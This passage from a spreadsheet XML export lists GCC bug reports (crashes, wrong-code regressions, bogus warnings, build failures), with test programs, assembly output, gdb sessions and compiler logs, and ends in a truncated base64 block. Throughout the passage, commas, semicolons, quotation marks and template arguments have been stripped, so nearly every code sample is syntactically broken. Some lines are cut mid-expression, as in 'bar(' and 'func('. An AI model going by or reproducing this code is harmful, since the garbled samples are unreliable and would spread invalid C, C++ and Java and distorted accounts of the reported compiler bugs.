    s-&gt;i++
}
void stdcall bar(struct S *s)
{
    foo(s)
    s-&gt;f(s)
}
int main(void)
{
    struct S s = { foo 0 }
    bar(
}
============================================
This is what the compiler produces:
bar:
        pushl   %ebp
        movl    %esp %ebp
        pushl   %ebx
        subl    $20 %esp
        movl    8(%ebp) %ebx
        movl    %ebx (%esp)
        call    foo
        subl    $4 %esp
        movl    %ebx 8(%ebp)
        movl    -4(%ebp) %ebx
        leave
        jmp     *(%ebx)</t>
  </si>
  <si>
    <t>GCC-6090</t>
  </si>
  <si>
    <t>Problem with copy of std_valarray</t>
  </si>
  <si>
    <t>Problem with operator= :
valarray::operator= (const valarray&amp; __v)
{
    __valarray_copy(__v._M_data _M_size _M_data)
    return *this
}
contrary to :
template
inline valarray::valarray (const valarray&amp; __v)
        : _M_size (__v._M_size) _M_data (new _Tp[__v._M_size])
{ __valarray_copy (__v._M_data _M_size _M_data) }
never modify size of target.
Release:
happened with gcc 2.95.3
Environment:
linux mandrake 8.1</t>
  </si>
  <si>
    <t>erwan.goasdoue</t>
  </si>
  <si>
    <t>GCC-57537</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] gcc.dg/vect/slp-widen-mult-half.c generating wrong code on PowerPC64</t>
  </si>
  <si>
    <t>The gcc.dg/vect/slp-widen-mult-half.c test tests autovectorization of this inner loop:
  for (i = 0 i &lt; N/2 i++)
    {
      out[2*i] = in[2*i] * COEF
      out2[2*i] = in[2*i] + COEF2
      out[2*i+1] = in[2*i+1] * COEF
      out2[2*i+1] = in[2*i+1] + COEF2
    }
The execution portion of this test is failing on AltiVec-enabled powerpc64 targets on both the 4.8 branch (which is essentially at the point of the 4.8.1 release at the point I tested it) and on trunk.
The symptoms appear to strongly indicate that this is a simple matter of wrong code generation: the out[] array is zeroed out rather than having the correct values assigned.  The out2[] array is correct.
In case it helps someone here is the line of instrumentation code that I added to the test to investigate the computed values:
 for (i = 0 i &lt; N i++)
   printf(at %d: %d == %d %d == %d\n i out[i] in[i] * COEF
          out2[i] in[i] + COEF2)
I also tried putting some nonzero initial values in out[] before the vectorized loop the output remains zero so this is being actively zeroed out.</t>
  </si>
  <si>
    <t>GCC-71902</t>
  </si>
  <si>
    <t>[5/6 Regression] Unneeded temporary on reallocatable character assignment</t>
  </si>
  <si>
    <t>After the fix for PR 71783 the original code from Toon's test
case has an unnecessary temporary allocation. Translating
  character(len=ilen) allocatable :: cline(:)
  allocate(cline(2))
  cline(1) = 'a'
  cline(2) = cline(1)
yields
  BLOCK 
    symtree: '__var_1_trim'|| symbol: '__var_1_trim' 
      type spec : (CHARACTER () 1)
      attributes: (VARIABLE  ALLOCATABLE)
    symtree: 'block@3'     || symbol: 'block@3'      
      type spec : (UNKNOWN 0)
      attributes: (LABEL )
    ASSIGN block@3:__var_1_trim prtdata:cline(1)
    ASSIGN prtdata:cline(2) block@3:__var_1_trim
  END BLOCK 
This was not done in 4.9.  So dependency handling can
be improved here.</t>
  </si>
  <si>
    <t>GCC-61456</t>
  </si>
  <si>
    <t>[4.9 Regression] Bogus may be used uninitialized warning</t>
  </si>
  <si>
    <t>This test case:
problem.cc
==========
int rand ()
class Funcs
{
public:
    int *f1 ()
    int *f2 ()
}
typedef decltype (
static int Set (Funcs * f const pfunc &amp; fp)
{
    (f-&gt;*fp) ()
}
void
Foo ()
{
    pfunc fp = 
    if (rand ())
        fp = 
    Set (0 fp)
}
compiled with trunk compiler:
g++ ./problem.cc -O2 -std=c++0x -c -Werror=uninitialized
./problem.cc: In function â€˜void Foo()â€™:
./problem.cc:13:15: error: â€˜fp.int* (Funcs::* const)()::__deltaâ€™ is used uninitialized in this function [-Werror=uninitialized]
     (f-&gt;*fp) ()
               ^
./problem.cc:19:11: note: â€˜fp.int* (Funcs::* const)()::__deltaâ€™ was declared here
     pfunc fp = &amp;Funcs::f1
With -fdump-tree-all the dce1 pass is deleting the statement:
fp.__delta = 0
even though this is later used with the following gimple sequence:
  _22 = fp.__delta
  _24 = (struct Funcs *) _22
  iftmp.2_25 (_24)</t>
  </si>
  <si>
    <t>tmsriram</t>
  </si>
  <si>
    <t>GCC-80769</t>
  </si>
  <si>
    <t>[6 Regression] Invalid delayed string length computation in tree-ssa-strlen.c</t>
  </si>
  <si>
    <t>This testcase below (which uses strlenopt.h in gcc/testsuite/gcc.dg) fails at -O2 but passes with -O0.  tree-ssa-strlen.c isn't invalidating delayed string lengths when x is added to the end.
#define USE_GNU
#include strlenopt.h
__attribute__((noinline noclone)) int
bar (char *p1 const char *q)
{
  strcpy (p1 abcde)
  char *p2 = strchr (p1 '\0')
  strcpy (p2 q)
  char *p3 = strchr (p2 '\0')
  memcpy (p3 x 2)
  return strlen (p1)
}
int
main (void)
{
  char buffer[10]
  int res = bar (buffer foo)
  if (strcmp (buffer abcdefoox) != 0 || res != 9)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-10075</t>
  </si>
  <si>
    <t>g++ 3.2.2 's const array problem.</t>
  </si>
  <si>
    <t>below code..
    char* const a = First
    *(a+1)='O'   -------------------- segment fault 
    printf(%s\n a)
that must be running in standard c++.
and I found that's not error in gdb.
[errai]$ gdb ./const
GNU gdb Red Hat Linux (5.2.1-4)
Copyright 2002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386-redhat-linux...
(gdb) break 4
Breakpoint 1 at 0x8048398: file const.cc line 4.
(gdb) run
Starting program: /home/errai/test/const 
Breakpoint 1 main () at const.cc:4
4               char* const a = First
(gdb) n
5           *(a+1)='O'
(gdb) n
6           printf(%s\n a)
(gdb) n
FOrst         ------------------------- not error
7       }
(gdb) n
0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) n
Single stepping until exit from function __libc_start_main 
which has no line number information.
Program
(gdb)
Release:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2.2/specs
Environment:
Pentium3-800 RedHat Linux 8.0</t>
  </si>
  <si>
    <t>errai</t>
  </si>
  <si>
    <t>GCC-6465</t>
  </si>
  <si>
    <t>Segfault on conflicting types</t>
  </si>
  <si>
    <t>Compilation results into segfault:
# g++31 -I./../include  -c -o togl.o --save-temps togl.cpp
In file included from togl.cpp:4:
../include/tkInt8.0p2.h:35: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compiling with gcc-3.0.x and gcc-2.95.x which gives proper diagnosis:
In file included from togl.cpp:4:
../include/tkInt8.0p2.h:35: conflicting types for `struct Tk_PostscriptInfo'
/usr/include/tk.h:115: previous declaration as `typedef struct 
   Tk_PostscriptInfo_*Tk_PostscriptInfo'
=&gt; Regression against gcc-3.0.x
Release:
g++31 (GCC) 3.1 20020424 (prerelease)
Environment:
i686-Linux Linux-binutils-2.12.90.0.4
How-To-Repeat:
Compile file from attachment:
g++31 -o togl.o togl.ii</t>
  </si>
  <si>
    <t>GCC-61026</t>
  </si>
  <si>
    <t>sh-rtems4.11 build of 4.9.0 fails on FreeBSD 10 c++ (clang).</t>
  </si>
  <si>
    <t>Building gcc-4.9.0 and gcc-4.8.2 for the sh-rtems4.11 on FreeBSD 10 using the standard c++ compiler fails with ...
 [ Note config/sh/sh.c has a comment about this at the top ]
In file included from /usr/include/c++/v1/ostream:133:
/usr/include/c++/v1/locale:444:36: error: attempt to use a poisoned identifier
        __status = (unsigned char*)malloc(__nkw)
                                   ^
/usr/include/c++/v1/locale:1716:28: error: attempt to use a poisoned identifier
        __ob = (char_type*)malloc(2*static_cast(__nc)*sizeof(char_type))
                           ^
/usr/include/c++/v1/locale:1785:28: error: attempt to use a poisoned identifier
        __ob = (char_type*)malloc(2*static_cast(__nc)*sizeof(char_type))
                           ^
/usr/include/c++/v1/locale:2968:22: error: attempt to use a poisoned identifier
    _Tp* __t = (_Tp*)realloc(__owns ? __b.get() : 0 __new_cap)
                     ^
/usr/include/c++/v1/locale:3228:30: error: attempt to use a poisoned identifier
            __h.reset((char*)malloc(static_cast(__wn - __wb.get() + 2)))
                             ^
/usr/include/c++/v1/locale:3527:32: error: attempt to use a poisoned identifier
        __hd.reset((char_type*)malloc(__n * sizeof(char_type)))
                               ^
fatal error: too many errors emitted stopping now [-ferror-limit=]
14 warnings and 20 errors generated.
Configure ...
 ../gcc-4.9.0/configure --prefix=/home/chrisj/development/rtems/4.11 --bindir=/home/chrisj/development/rtems/4.11/bin --exec_prefix=/home/chrisj/development/rtems/4.11 --includedir=/home/chrisj/development/rtems/4.11/include --libdir=/home/chrisj/development/rtems/4.11/lib --libexecdir=/home/chrisj/development/rtems/4.11/libexec --mandir=/home/chrisj/development/rtems/4.11/share/man --infodir=/home/chrisj/development/rtems/4.11/share/info --datadir=/home/chrisj/development/rtems/4.11/share --build=x86_64-freebsd10.0 --host=x86_64-freebsd10.0 --target=sh-rtems4.11 --disable-libstdcxx-pch --with-gnu-as --with-gnu-ld --verbose --with-newlib --with-system-zlib --disable-nls --without-included-gettext --disable-win32-registry --enable-version-specific-runtime-libs --disable-lto --enable-newlib-io-c99-formats --enable-newlib-iconv --enable-newlib-iconv-encodings=big5cp775cp850cp852cp855cp866euc_jpeuc_kreuc_twiso_8859_1iso_8859_10iso_8859_11iso_8859_13iso_8859_14iso_8859_15iso_8859_2iso_8859_3iso_8859_4iso_8859_5iso_8859_6iso_8859_7iso_8859_8iso_8859_9iso_ir_111koi8_rkoi8_rukoi8_ukoi8_uniucs_2ucs_2_internalucs_2beucs_2leucs_4ucs_4_internalucs_4beucs_4leus_asciiutf_16utf_16beutf_16leutf_8win_1250win_1251win_1252win_1253win_1254win_1255win_1256win_1257win_1258 --enable-threads --disable-plugin --enable-languages=cc++
$ uname -a
FreeBSD sync.rtems.org 10.0-STABLE FreeBSD 10.0-STABLE #0 ed891fe(stable/10): Fri Apr 25 18:18:40 UTC 2014     amar@build1.rtems.org:/usr/obj/usr/src/sys/build1  amd64</t>
  </si>
  <si>
    <t>chrisj</t>
  </si>
  <si>
    <t>GCC-48900</t>
  </si>
  <si>
    <t>unnecessary duplicate __tls_get_addr calls</t>
  </si>
  <si>
    <t>This testcase when compiled with -fPIC generates two calls to __tls_get_addr.
extern __thread int i
void foo (void) { i++ }
The regression was introduced with the fix for PR44266</t>
  </si>
  <si>
    <t>GCC-10421</t>
  </si>
  <si>
    <t>java.text.Collator.getInstance returns null for de locale</t>
  </si>
  <si>
    <t>Collator.getInstance returns null for de locale. Sample code throws NullPointerException 'cause getInstance doesn't create Collator.
Problem is in RuleBasedCollator constructor which doesn't handle '&amp;' reset properly. The fix bellow solves the problem for me.
I don't know if this could be related to PR 9613.
Release:
3.3 20030415 (prerelease)
Environment:
RedHat 8.0 &amp; Slackware 8.0
How-To-Repeat:
/* TestCollator.java */
import java.text.Collator
import java.text.RuleBasedCollator
import java.util.Locale
class TestCollator {
    public static void main (String[]argv) throws Throwable
    {
        Collator c = Collator.getInstance (new Locale (de))
        printCompare (c stra\u00dfe stra\u00dfe)
        printCompare (c M\u00fcnchen Muenchen)
        c = new RuleBasedCollator (&lt;a&lt;b&lt;c
        printCompare (c bc bc)
        printCompare (c abcde abcd)
    }
    public static void printCompare (Collator c String one String two)
    {
        System.out.println (one +-(+ c.compare (one two) +)-+ two)
    }
}
/* End of TestCollator.java */</t>
  </si>
  <si>
    <t>vpuskas</t>
  </si>
  <si>
    <t>GCC-9987</t>
  </si>
  <si>
    <t>Failure to call a copy constructor with complex templated member functions.</t>
  </si>
  <si>
    <t>The copy constructor for the Ref class is not called
when a reference is copied into a list&gt;. This means
that the reference count is not incremented and a duplicate
free eventually happens.
The program includes simpler code for a list which
does correctly call the copy constructor. 
The problem happens when instantiating code from stl_construct.h:
_Construct(_T1* __p const _T2&amp; __value)
    { new (static_cast(__p)) _T1(__value) }
The _T1(__value) should always call the copy constructor
for _T1.
Release:
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
Environment:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
 /usr/lib/gcc-lib/i386-redhat-linux/3.2/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -I../ -I../../stage/include -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ -DHAVE_MYSQL -D_XOPEN_SOURCE=600 -DWITH_GZIP x.cc -Wall x.ii
GNU CPP version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 ..
 ../../stage/include
 /usr/include/c++/3.2
 /usr/include/c++/3.2/i386-redhat-linux
 /usr/include/c++/3.2/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/3.2/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/3.2/cc1plus -fpreprocessed x.ii -quiet -dumpbase x.cc -g -Wall -version -o x.s
GNU CPP version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) (i386-redhat-linux)
	compiled by GNU C version 3.2 20020903 (Red Hat Linux 8.0 3.2-7).
 as -V -Qy -o x.o x.s
GNU assembler version 2.13.90.0.2 (i386-redhat-linux) using BFD version 2.13.90.0.2 20020802
 /usr/lib/gcc-lib/i386-redhat-linux/3.2/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o x /usr/lib/gcc-lib/i386-redhat-linux/3.2/../../../crt1.o /usr/lib/gcc-lib/i386-redhat-linux/3.2/../../../crti.o /usr/lib/gcc-lib/i386-redhat-linux/3.2/crtbegin.o -L../../stage/lib -L/usr/lib/gcc-lib/i386-redhat-linux/3.2 -L/usr/lib/gcc-lib/i386-redhat-linux/3.2/../../.. x.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc-lib/i386-redhat-linux/3.2/crtend.o /usr/lib/gcc-lib/i386-redhat-linux/3.2/../../../crtn.o
How-To-Repeat:
Run the program. It segfaults due to the duplicate free.
Examine the machine code generated for 
   void std::_Construct(Entry* Entry const&amp;)
vs
void std::_Construct Ref &gt;(Ref* Ref const&amp;)
The latter just does a byte copy rather than call the constructor.</t>
  </si>
  <si>
    <t>a.shipman</t>
  </si>
  <si>
    <t>GCC-4992</t>
  </si>
  <si>
    <t>Weird Parse error</t>
  </si>
  <si>
    <t>It can't seem to parse a simple constructor call to a template class. I have no reasonable work-around. This works fine in Visual C++ 6.0 and Borland C++ Builder 5.0. I've removed everything possible to reproduce the error in the minimum amount of code. See file bug.cpp.
Release:
2.95.3-5
Environment:
Cygwin under Windows XP Pro.
How-To-Repeat:
Just compile bug.cpp.</t>
  </si>
  <si>
    <t>cda</t>
  </si>
  <si>
    <t>GCC-23440</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] void f(){for crashes the C++ frontend</t>
  </si>
  <si>
    <t>Since GCC 4.0.0 the C++ frontend ICEs on code like
  void foo() { for
But unlike PR23439 the C++ parser also ICEs on
  void foo() { for ()
or
  void foo() { if ()
or
  void foo() { while ()</t>
  </si>
  <si>
    <t>GCC-78444</t>
  </si>
  <si>
    <t>Wrong prologue stack alignment for implicit dtor on x86_64-darwin*</t>
  </si>
  <si>
    <t>Created attachment 40095
stand-alone reproducer (c++11)
-std=c++11 -fno-exceptions -fno-rtti
In this code there's an implict dtor which calls a base class dtor.  The stack is incorrectly aligned at the call to the second dtor (leading to dyld complaining and aborting the code).
        .globl __ZN4llvm2cl6parserIjED1Ev
        .weak_definition __ZN4llvm2cl6parserIjED1Ev
__ZN4llvm2cl6parserIjED1Ev:
LFB15:
        pushq   %rbp
LCFI21:
        movq    %rsp %rbp
LCFI22:
        subq    $8 %rsp
        movq    %rdi -8(%rbp)
        movq    -8(%rbp) %rax
        movq    %rax %rdi
        call    __ZN4llvm2cl12basic_parserIjED2Ev
        leave
LCFI23:
        ret
LFE15:
=====
AFAICT has been present since c++11 introduction in 4.7 (so seems to be an infrequently triggered issue).
I can't see any particular reason why this is Darwin-specific (the x86_64 code in the back end has very little Darwin conditional code).  However it looks like Linux clones the dtor (_ZN4llvm2cl6parserIjED2Ev) and generates correct prologue code for that.  So it's not clear if this is Darwin-specific or just that the fail conditions are only triggered for Darwin.
Looking at the tree dumps the dtors look like regular weak hidden functions.
====
Looking at the incoming state to ix86_expand_prologue it seems that the function is expecting the stack_alignment_needed to be already set to a valid amount.
with some debug code at the entry of ix86_expand_prologue():
$ ./prev-gcc/xg++ -Bprev-gcc -fno-exceptions -fno-rtti /Volumes/sc3_src/test-cxx/prologue-x86-64-bug.C -S
_ZN4llvm2cl6OptionD2Ev : is leaf Y incoming 128 set align_needed 64 realign N
_ZN4llvm2cl12basic_parserIjED2Ev : is leaf Y incoming 128 set align_needed 64 realign N
_ZN4llvm2cl12basic_parserIjED1Ev : is leaf Y incoming 128 set align_needed 64 realign N
_ZN4llvm2cl3optIjLb0ENS0_6parserIjEEE16handleOccurrenceEjNS_9StringRefES5_ : is leaf Y incoming 128 set align_needed 64 realign N
_ZNK4llvm2cl3optIjLb0ENS0_6parserIjEEE16printOptionValueEjb : is leaf Y incoming 128 set align_needed 64 realign N
_ZN4llvm2cl6parserIjED1Ev : is leaf N incoming 128 set align_needed 64 realign N
_ZN4llvm2cl3optIjLb0ENS0_6parserIjEEED1Ev : is leaf N incoming 128 set align_needed 128 realign N
_ZN4llvm2cl3optIjLb0ENS0_6parserIjEEED0Ev : is leaf N incoming 128 set align_needed 128 realign N
Notice that _ZN4llvm2cl6parserIjED1Ev is not a leaf function but only claims to need 64b alignment.
If I hack the following into ix86_finalize_stack_realign_flags()
  if (TARGET_MACHO &amp;&amp; TARGET_64BIT &amp;&amp; !crtl-&gt;is_leaf)
    {
	/* Darwin needs at least 128b alignment at function calls.  */
	crtl-&gt;stack_alignment_needed = crtl-&gt;stack_alignment_needed &lt; 128
				     ? 128
				     : crtl-&gt;stack_alignment_needed
	crtl-&gt;preferred_stack_boundary = crtl-&gt;preferred_stack_boundary &lt; 128
				       ? 128
				       : crtl-&gt;preferred_stack_boundary
    }
it works around the issue.
So the questions are
1. are preceding phases (e.g. cfgexpand) supposed to make target callbacks that get this right?
2. is something missing in the pro/epilogue that's supposed to detect this case and fix it up?</t>
  </si>
  <si>
    <t>iains</t>
  </si>
  <si>
    <t>GCC-60682</t>
  </si>
  <si>
    <t>[4.9 Regression][OpenMP] ICE on an assignment of local variable inside SIMD loop</t>
  </si>
  <si>
    <t>Seems r207629 (fix for PR59984) introduces given issue.
Test is 
class V3
{
public:
    float v[1]
    V3() {}
    V3(const V3 &amp;x)
      {
       v[0] = x.v[0]
      }
}
struct CCC
{
  V3 a[16]
}
void foo(int num CCC &amp;cc) 
{
#pragma omp simd
  for(int i = 0 i &lt; num ++i)
    {
      V3 v3
      cc.a[i] = v3 
    }
}
compilation flags: -O1  -fopenmp
ICE:
internal compiler error: in create_tmp_var at gimple-expr.c:506
       cc.a[i] = v3
                   ^
0x97ab03 create_tmp_var(tree_node* char const*)
Note that v3's privatization makes ICE disappear.</t>
  </si>
  <si>
    <t>izamyatin</t>
  </si>
  <si>
    <t>GCC-960</t>
  </si>
  <si>
    <t>Cannot compile anything</t>
  </si>
  <si>
    <t>Compiling even the simplest C++ source fails. I suspect that
my gcc installation is somehow broken but as I'm unsure of
how to solve the problem I thought I'd ask you. This is the
first time I'm trying to build software on the computer.
This is the source file:
-- main.cpp begin
#include 
int main(int argc char* argv[])
{
        printf(Testing\n)
        return 0
}
-- main.cpp end
This is the result:
$ gcc -v -save-temps -c main.cpp
Using builtin specs.
gcc version 2.95.2 19991024 (release)
 /usr/libexec/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Di386 -Dunix -D__FreeBSD__=4 -D__FreeBSD_cc_version=410000 -D__i386__ -D__unix__ -D__FreeBSD__=4 -D__FreeBSD_cc_version=410000 -D__i386 -D__unix -Acpu(i386) -Amachine(i386) -Asystem(unix) -Asystem(FreeBSD) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__ELF__ main.cpp main.ii
GNU CPP version 2.95.2 19991024 (release) (i386 FreeBSD/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++
 /usr/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/libexec/cc1plus main.ii -quiet -dumpbase main.cc -version -o main.s
GNU C++ version 2.95.2 19991024 (release) (i386-unknown-freebsd) compiled by GNU C version 2.95.2 19991024 (release).
In file included from main.cpp:1:
/usr/include/stdio.h: In function `int __sputc(int FILE *)':
/usr/include/stdio.h:356: Internal compiler error.
/usr/include/stdio.h:356: Please submit a full bug report.
/usr/include/stdio.h:356: See  for instructions.
Compiling other sources (that build ok on another FreeBSD
computer) usually fail with similar errors. The errors seem
to be related to preprocessor macros.
Thank You for any help you might be able to provide
Sami Vaaraniemi
sami.vaaraniemi@helsinki.fi
Release:
gcc version 2.95.2 19991024 (release)
Environment:
FreeBSD 4.1.1-RELEASE #0 i386
How-To-Repeat:
The problem occurs every time with the same source
file and command line.</t>
  </si>
  <si>
    <t>sami.vaaraniemi</t>
  </si>
  <si>
    <t>GCC-67501</t>
  </si>
  <si>
    <t>Bad error recovery for invalid OpenMP clauses in C FE</t>
  </si>
  <si>
    <t>/* */
/* { dg-do compile } */
/* { dg-options -fopenmp } */
void
foo (void)
{
  int i
  #pragma omp for simd simdlen(4
  for (i = 0 i &lt; 16 ++i)
}
ICEs during clause splitting the C++ FE handles this right.</t>
  </si>
  <si>
    <t>GCC-40814</t>
  </si>
  <si>
    <t>internal compiler error: in digest_init at cp/typeck2.c:709</t>
  </si>
  <si>
    <t>I stumbled upon this very unusual error. I don't know if it's worth investigating since I'm note even sure that this is legal code:
Anyway GCC says:
test.cpp:8: internal compiler error: in digest_init at cp/typeck2.c:709
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccxi24ed.out file please attach this to your bugreport.
---------------------------
here is the offending code:
---------------------------
#include 
using namespace std
void paperino() { cout &lt;&lt; __FUNCTION__ &lt;&lt; endl }
void pippo() { cout &lt;&lt; __FUNCTION__ &lt;&lt; endl }
template void func(const T&amp; x) {
    T other(x)
    other()
}
int main() {
    func(paperino)
    func(
}</t>
  </si>
  <si>
    <t>cbellettini</t>
  </si>
  <si>
    <t>GCC-50569</t>
  </si>
  <si>
    <t>[4.6/4.7 regression] unaligned memory accesses generated for memcpy</t>
  </si>
  <si>
    <t>Created attachment 25382
Test code that shows the issue
This issue shows up in 4.6.1 but is not present in 4.5.1.
The attached sample code picks up a buffer pointer from external data structures copies a block of data to a temporary variable and then references the temporary.  GCC 4.6.1 optimized away the memcpy and instead directly references the original data which is fine... except that the pointer is char * meaning that the data structure in that buffer is not necessarily aligned.  And the references through that pointer are written as if the data IS aligned so on my strict-alignment target (MIPS) I get an alignment exception.
GCC 4.5.1 does it right -- it also optimizes away the memcpy but it accesses the original data using unaligned accesses.</t>
  </si>
  <si>
    <t>paul_koning</t>
  </si>
  <si>
    <t>GCC-31554</t>
  </si>
  <si>
    <t>stable_partition assumes iterator difference type is always ptrdiff_t</t>
  </si>
  <si>
    <t>Instantiating stable_partition with an iterator where the difference_type is
something different than ptrdiff_t results in an error like this:
.../bits/stl_algo.h: In function `_ForwardIterator std::stable_partition(_ForwardIterator _ForwardIterator _Predicate) [with _ForwardIterator = my_iterator _Predicate = bool (*)(double)]':
test.c:32:   instantiated from here
.../bits/stl_algo.h:2154: error: no matching function for call to `__stable_partition_adaptive(my_iterator&amp; my_iterator&amp; bool (*&amp;)(double) short int double* ptrdiff_t)'
The __stable_parition_adaptive effectively requires the __len and __buffer_size arguments to have the same type and stable_parition calls it with one of them always as ptrdiff_t.</t>
  </si>
  <si>
    <t>djg</t>
  </si>
  <si>
    <t>GCC-3155</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
unknown
Environment:
Redhat Linux 7.1
gcc version 3.0 20010612 (prerelease)
How-To-Repeat:
g++ -v -W -Wall -Wpointer-arith -pipe -O3 -g -Wno-uninitialized -fno-implicit-templates   -D_POSIX_THREADS -D_POSIX_THREAD_SAFE_FUNCTIONS -D_REENTRANT -DACE_HAS_AIO_CALLS \
-DACE_HAS_EXCEPTIONS  -c POSIX_Proactor.ii</t>
  </si>
  <si>
    <t>GCC-51390</t>
  </si>
  <si>
    <t>Builtin changes on November 29th broke recip-5.c</t>
  </si>
  <si>
    <t>After my builtin changes went in on November 29th 2011 the test gcc.target/powerpc/recip-5.c started failing.  This was due to a thinko on my part where I used the wrong structure field to figure out the appropriate attributes for the builtin function and the recipdiv builtin function was not listed as a const function with -ffast-math which would allow the vectorizer to vectorize the function.</t>
  </si>
  <si>
    <t>GCC-10492</t>
  </si>
  <si>
    <t>Re: Bug#186299: optimization/10315: [3.2/3.3 regression] [powerpc] ICE: in extract_insn at recog.c:2175</t>
  </si>
  <si>
    <t xml:space="preserve"> UmljaGFyZCBIZW5kZXJzb24gd3JpdGVzOg0KPiBPbiBXZWQsIEFwciAyMywgMjAwMyBhdCAw
 Mzo1MDo0M1BNIC0wNzAwLCBSaWNoYXJkIEhlbmRlcnNvbiB3cm90ZToNCj4gPiBUaGlzIGlz
 IHRoZSBzYW1lIGFzIFBSODMwMCwgd2hpY2ggSSBhbSBsb29raW5nIGF0IHRvZGF5Lg0KPiAN
 Cj4gV2VsbCwgbm90IHF1aXRlIHRoZSBzYW1lLiAgVGhlcmUgYXJlIGEgY291cGxlIG9mIGJ1
 Z3MgaGVyZSwgYW55IG9uZQ0KPiBvZiB3aGljaCB3aWxsIGZpeCB0aGUgY3Jhc2guDQo+IA0K
 PiBGaXJzdCwgcnM2MDAwX2VtaXRfbW92ZSBkZWNpZGVkIHRoYXQgYW55IHRpbWUgaXQgd2Fz
 IGNhbGxlZCB3aXRoIGENCj4gbm9uLWdlbmVyYWxfb3BlcmFuZCBpbnB1dCwgdGhhdCBpdCBt
 dXN0IGJlIHJlbG9hZCBkb2luZyBzb21ldGhpbmcNCj4gd2VpcmQuICBUaGUgYXR0YWNoZWQg
 cGF0Y2ggKHdoaWNoIGhhcyBvbmx5IGJlZW4gY3Jvc3MtdGVzdGVkIHZzIHRoZQ0KPiBwciB0
 ZXN0IGNhc2UpIHdvdWxkIGFwcGVhciB0byBkbyB0aGUgcmlnaHQgdGhpbmcuICBXb3VsZCBz
 b21lb25lIA0KPiBwbGVhc2UgZ2l2ZSB0aGlzIHByb3BlciBib290c3RyYXAgdGVzdGluZz8N
 Cg0KYm9vdHN0cmFwcGVkIENWUyAyMDAzMDQyNCB3aXRoIGFuZCB3aXRob3V0IHRoaXMgcGF0
 Y2guIG5vIGRpZmZlcmVuY2VzLg0KDQoJTWF0dGhpYXMNCg0KUmVzdWx0cyBmb3IgMy4zIDIw
 MDMwNDI0IChwcmVyZWxlYXNlKSB0ZXN0c3VpdGUgb24gcG93ZXJwYy11bmtub3duLWxpbnV4
 LWdudQ0KTEFTVF9VUERBVEVEOiBUaHUgQXByIDI0IDA1OjQ3OjI1IFVUQyAyMDAzDQoNCk5h
 dGl2ZSBjb25maWd1cmF0aW9uIGlzIHBvd2VycGMtdW5rbm93bi1saW51eC1nbnUNCg0KCQk9
 PT0gZysrIHRlc3RzID09PQ0KDQoNClJ1bm5pbmcgdGFyZ2V0IHVuaXgNCkZBSUw6IGcrKy5k
 Zy9jb21wYXQvYnJlYWsvYml0ZmllbGQ3IHlfdHN0Lm8gY29tcGlsZQ0KVU5SRVNPTFZFRDog
 ZysrLmRnL2NvbXBhdC9icmVhay9iaXRmaWVsZDcgeF90c3Quby15X3RzdC5vIGxpbmsgDQpV
 TlJFU09MVkVEOiBnKysuZGcvY29tcGF0L2JyZWFrL2JpdGZpZWxkNyB4X3RzdC5vLXlfdHN0
 Lm8gZXhlY3V0ZSANClhQQVNTOiBnKysuZGcvb3RoZXIvcGFja2VkMS5DIGV4ZWN1dGlvbiB0
 ZXN0DQpGQUlMOiBnKysuZGcvcGFyc2UvY3Jhc2gyLkMgICh0ZXN0IGZvciBlcnJvcnMsIGxp
 bmUgNSkNCkZBSUw6IGcrKy5kZy9wYXJzZS9jcmFzaDIuQyAodGVzdCBmb3IgZXhjZXNzIGVy
 cm9ycykNCkZBSUw6IGcrKy5iZW5qYW1pbi90eXBlZGVmMDEuQyAuKiAodGVzdCBmb3IgZXJy
 b3JzLCBsaW5lIDQ2KQ0KRkFJTDogZysrLm90aGVyL2VsYWIxLkMgVCBpcyBhIHRlbXBsYXRl
 IHR5cGUgcGFyYW1ldGVyICh0ZXN0IGZvciBlcnJvcnMsIGxpbmUgOCkNClhQQVNTOiBnKysu
 b3RoZXIvaW5pdDUuQyAgRXhlY3V0aW9uIHRlc3QNCg0KCQk9PT0gZysrIFN1bW1hcnkgPT09
 DQoNCiMgb2YgZXhwZWN0ZWQgcGFzc2VzCQk3ODk5DQojIG9mIHVuZXhwZWN0ZWQgZmFpbHVy
